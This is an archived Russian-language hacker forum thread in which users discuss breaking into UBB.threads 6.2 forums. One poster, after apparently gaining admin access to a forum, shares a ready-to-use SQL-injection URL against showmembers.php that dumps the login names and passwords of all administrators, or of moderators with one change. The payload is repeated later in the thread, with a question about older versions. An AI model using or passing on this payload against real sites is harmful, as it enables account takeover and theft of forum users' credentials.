PDA

Просмотр полной версии : Уязвимости в UBB.threads 6.2


afonya
31.03.2005, 21:05
Хола ! народ посоветуйте плиз...
ситуация такая... я в админке форума UBB.threads 6.2 папробовал сделать бэкап базы думал что произайдёт приблезительно тоже что и с phpBB, тоесть он хотябы придолжет скачять этот бэкап... но этого не произашло...
)):

чё делть... ?! мож кто сталкивался с этим....

CunningFox
01.04.2005, 10:43
скажи плиз, как ты его взломал?

afonya
02.04.2005, 17:39
UBB.threads 6.2.*-6.3.* sql-injection:
http://[host]/showmembers.php?Cat=&like=1'%20union%20select%20U_LoginName,0,0,U_Passw ord,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*
Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров.

forever777
01.07.2006, 04:47
UBB.threads 6.2.*-6.3.* sql-injection:
http://[host]/showmembers.php?Cat=&like=1'%20union%20select%20U_LoginName,0,0,U_Passw ord,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*
Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров.
если уязвимости в UBB.threads™ 6.1.1???